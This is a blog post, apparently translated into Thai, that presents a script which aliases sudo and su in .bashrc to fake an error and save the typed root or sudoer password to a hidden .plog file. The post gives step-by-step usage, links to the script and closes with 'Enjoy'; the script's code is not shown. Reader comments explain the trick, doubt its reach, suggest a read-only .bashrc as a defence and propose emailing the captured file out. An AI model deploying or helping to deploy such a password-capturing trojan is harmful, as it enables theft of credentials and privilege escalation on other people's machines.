รับรหัสผ่าน ROOT

ฉันเจอสคริปต์ที่เปลี่ยน. bashrc สร้างนามแฝงสำหรับ "sudo" และ "su" ก่อนหน้านี้โดยไม่ทำการสำรองข้อมูลของไฟล์เพื่อเรียกคืนในภายหลัง

สิ่งที่ทำคือมันส่งข้อความแสดงข้อผิดพลาดเมื่อใช้ "sudo" หรือ "su" และจับรหัสผ่านในบันทึกที่เรียกว่า ".plog" ซึ่งอยู่ในบ้าน

วิธีใช้

  1. บันทึกสคริปต์
  2. ให้สิทธิ์ในการดำเนินการ
  3. เรียกใช้ในเทอร์มินัล
  4. ปิดเทอร์มินัล
  5. รอ.
  6. จากนั้นตรวจสอบไฟล์. plog และต้องมีรหัสผ่านของ root หรือของผู้ใช้บางคนที่อยู่ใน sudoers

http://paste.desdelinux.net/4691

สนุก.


แสดงความคิดเห็นของคุณ

อีเมล์ของคุณจะไม่ถูกเผยแพร่ ช่องที่ต้องการถูกทำเครื่องหมายด้วย *

*

*

  1. ผู้รับผิดชอบข้อมูล: Miguel ÁngelGatón
  2. วัตถุประสงค์ของข้อมูล: ควบคุมสแปมการจัดการความคิดเห็น
  3. ถูกต้องตามกฎหมาย: ความยินยอมของคุณ
  4. การสื่อสารข้อมูล: ข้อมูลจะไม่ถูกสื่อสารไปยังบุคคลที่สามยกเว้นตามข้อผูกพันทางกฎหมาย
  5. การจัดเก็บข้อมูล: ฐานข้อมูลที่โฮสต์โดย Occentus Networks (EU)
  6. สิทธิ์: คุณสามารถ จำกัด กู้คืนและลบข้อมูลของคุณได้ตลอดเวลา

  1.   v3บน dijo

    สำหรับพวกนี้คือความปลอดภัยทางกายภาพของทีมเราไม่ควรละเลย

    1.    ทรูโกะ 22 dijo

      ถูกต้องถ้าพีซีให้ยืมสักครู่คุณต้องตรวจสอบนามแฝง😀

  2.   โลโล dijo

    คำถามที่ไร้เดียงสา:

    สคริปต์เปลี่ยน. bashrc ของผู้ใช้ sudoer ที่ไม่ใช่ตนเองอย่างไร

  3.   Blaire pascal dijo

    ฉันชอบมันมาก การทดสอบ

  4.   ปาโคเอโลโย dijo

    ดังนั้นความปลอดภัยและการเข้ารหัสที่เราใช้ใน gnu / linux จึงไร้ค่า? ฉันคิดว่าไม่เป็นเช่นนั้นใครก็ตามที่ลองทำสิ่งนี้ควรแสดงความคิดเห็นเกี่ยวกับผลลัพธ์ ตั้งแต่ใช้ระบบนี้ฉันได้อ่านมาว่าระดับการเข้ารหัสใน Linux นั้นสูงมากรหัสผ่านถูกเข้ารหัสโดยใช้อัลกอริธึมการลดการเข้ารหัสทางเดียวและตอนนี้ปรากฎว่าด้วยสคริปต์ง่ายๆที่การเข้ารหัสถูกข้ามไป ฉันขอโทษ แต่ไม่เชื่อ

    1.    @Jlcmux dijo

      ถ้ามันใช้งานได้ให้ดู สิ่งที่เกิดขึ้นคือสคริปต์สร้างนามแฝงใน. bashrc ด้วย sudo และ su และเมื่อคุณพิมพ์ su และ / หรือ sudo เขาอ่านนามแฝงก่อน ไม่ใช่คำสั่งเช่นนี้ ดังนั้นเมื่อคุณเขียนรหัสผ่านเขาจะใส่ไว้ในไฟล์ข้อความปกติ จากนั้นจะลบนามแฝงและให้คุณใช้ sudo หรือทั่วไปและปัจจุบันของคุณ ฉันหมายความว่ามันเหมือน pishing ไม่ใช่ว่าจะข้ามการเข้ารหัส มันคือการเข้าสู่ระบบปลอม

      1.    ปาโคเอโลโย dijo

        โอเคตอนนี้ถ้าฉันเข้าใจฉันรู้สึกประหลาดใจแล้วที่ข้ามการป้องกันนั้นไปยัง torrera .. ขอบคุณที่ชี้แจง

        1.    คิคิ dijo

          แน่นอน แต่สิ่งที่ยากที่สุดยังคงอยู่คือการแอบสคริปต์ไปยังพีซีของเหยื่อทำให้มันทำงานจากนั้นรับไฟล์จากระยะไกลหรือส่งไปยังอีเมล แต่ละคนจะต้องใช้จินตนาการ!

    2.    เคย dijo

      คุณพูดเกินจริงมาก pacoeloyo ฉันคิดว่า นี่คือโทรจันธรรมดาซึ่งต้องการให้ผู้ใช้หลีกเลี่ยงมาตรการรักษาความปลอดภัยต่างๆและการมีอยู่ในพื้นที่ของผู้โจมตี ที่มีอยู่ในระบบปฏิบัติการใด ๆ
      เกี่ยวกับสคริปต์ ... ถ้าฉันจำไม่ผิด SUDOs ปัจจุบันส่วนใหญ่รับรองความถูกต้องด้วยรหัสผ่านของผู้ใช้ไม่ใช่รหัสผ่านรูท ดังนั้นรหัสผ่านที่จะได้รับเป็นของผู้ใช้ (มีอยู่ใน sudoers)
      ความนับถือ

      1.    @Jlcmux dijo

        อยู่กับ sudo หรือ su นอกจากนี้หากผู้ใช้สามารถใช้ sudo ได้ก็เป็นเพราะเขาอยู่ใน sudoers และมีสิทธิพิเศษเช่นเดียวกับ root .. หรือไม่?

        1.    เคย dijo

          ไม่เสมอไปขึ้นอยู่กับการกำหนดค่า sudoers อย่างไรก็ตามสิ่งที่พบบ่อยที่สุดคือใช่คุณสามารถเข้าถึงได้เต็มรูปแบบ
          ประเด็นคือการดำเนินการโดยใช้ sudo มักจะถูกบันทึกไว้

      2.    ไดอะซีแพน dijo

        เพียงแค่เรียก "su" จะช่วยให้คุณสามารถเข้าถึงบัญชีรูทได้

  5.   ps dijo

    สิ่งนี้อันตรายมากหากคุณใช้รหัสผ่านที่ดีในห้องเรียนที่ใช้ร่วมกันหรือสภาพแวดล้อมการประชุมเชิงปฏิบัติการ พวกเขาสามารถเล่นให้คุณได้ พวกเขาสามารถเล่นได้ ...

    การค้นพบรหัสผ่านของคนแปลกหน้าไม่มีประโยชน์ แต่ฉันคิดว่าคนรู้จักก็เพียงพอแล้ว

    และอย่าลืมว่ารหัสผ่านส่วนใหญ่จะซ้ำกันหรือใช้รูปแบบทั่วไป อย่าประมาทพวกเขา ถ้าคุณเป็นไอ้มากแน่นอน ...

  6.   เกอร์เมน dijo

    ฉันไม่ยุ่ง ... ฉันไม่มีอะไรจะซ่อนไม่มีแม้แต่คำถามสอบปลายภาค ... และถ้าฉันต้องการรหัสผ่านฉันก็ถามมัน ... และฉันมีไฟล์อยู่ในฮาร์ดไดรฟ์ภายนอก .. ด้วยการสำรองข้อมูลบนแล็ปท็อปของฉันที่อยู่ในบ้าน
    คุณต้องมองหาความเรียบง่ายและใช้งานได้จริงวันนี้ฉันยังมีชีวิตอยู่พรุ่งนี้ฉันไม่รู้ ... ฉันมีชีวิตอยู่วันนี้ส่วนที่เหลือเป็นงานล่วงเวลา

  7.   เฟอร์ชเมทัล dijo

    ฉันจะเก็บไว้ในใจขอบคุณ

  8.   เอลินซ์ dijo

    น่าสนใจ!

  9.   โลโล dijo

    สคริปต์นี้คัดลอกตัวเองไปยัง. bashrc ของผู้ใช้ sudoer อย่างไร

    หากคุณมีบัญชีในคอมพิวเตอร์คุณจะไม่สามารถเข้าสู่บ้านของผู้ใช้รายอื่นได้เว้นแต่คุณจะได้รับอนุญาตและฉันยังสงสัยว่าคุณสามารถแก้ไข. bashrc ของเหยื่อได้

    ฉันสงสัยอย่างมากว่ามันจะใช้งานได้เว้นแต่ผู้ใช้ sudoer จะประมาทมาก

  10.   เล็กซ์ อเล็กซานเดร dijo

    เราต้องระวังสภาพอากาศนี้ให้มาก!

  11.   มาร์กอส dijo

    คำถามหนึ่งถ้าฉันไม่มีรหัสผ่านรูทฉันจะให้สิทธิ์การเรียกใช้ไฟล์ได้อย่างไร? หรือผู้ใช้งานปกติ?

    1.    @Jlcmux dijo

      ชัดเจน. สิทธิ์ในการดำเนินการไม่ได้ใช้เฉพาะกับ root

      1.    อัลแบร์โต อารู dijo

        ช่วยด้วย!
        หลังจากลองแล้วฉันได้ลบ. sudo_sd และไม่พบสิ่งใดใน google (หรือเครื่องมือค้นหาอื่น ๆ )

        1.    อัลแบร์โต อารู dijo

          ฉันลบ. plog และมันถูกลบโดยอัตโนมัติ. sudo_sd และฉันไม่สามารถเข้าสู่ระบบในฐานะรูทได้

          1.    อัลแบร์โต อารู dijo

            แก้ไขโดยการแสดงความคิดเห็น ALIAS

  12.   การ์ด dijo

    ถ้ามันใช้ได้กับ MAC ฉันจะหลอกร้าน Apple …เฮ้! แต่เพียงเล็กน้อยไม่ได้อยู่ในแผนก่อการร้าย😉

  13.   อะเทยูส dijo

    รายการที่น่าสนใจ

    ข้อสงสัย

    และถ้าฉันใช้ gksu หรือเทียบเท่าใน kde

    นอกจากนี้ยังจับรหัสผ่าน

    ความนับถือ

  14.   อายุการใช้งานหมวกนิรภัย dijo

    สามารถหลีกเลี่ยงการเรียกใช้สคริปต์นี้ได้โดยให้สิทธิ์แบบอ่านอย่างเดียวกับ. bashrc

  15.   บลาเซก dijo

    ทดสอบแล้วใช้งานได้ aunk มีข้อ จำกัด คุณเรียนรู้สิ่งใหม่ ๆ ใน Linux อยู่เสมอ

  16.   อัลแบร์โต อารู dijo

    ฉันจะยกเลิกการเปลี่ยนแปลงเมื่อทำไปแล้วได้อย่างไร ฉันได้ลบ. plog แล้วและมันจะไม่ให้ฉันใช้ sudo:
    bash: /home/alberto/.sudo_sd: ไม่มีไฟล์หรือไดเร็กทอรี

    1.    อัลแบร์โต อารู dijo

      แก้ไขโดยการแสดงความคิดเห็น ALIAS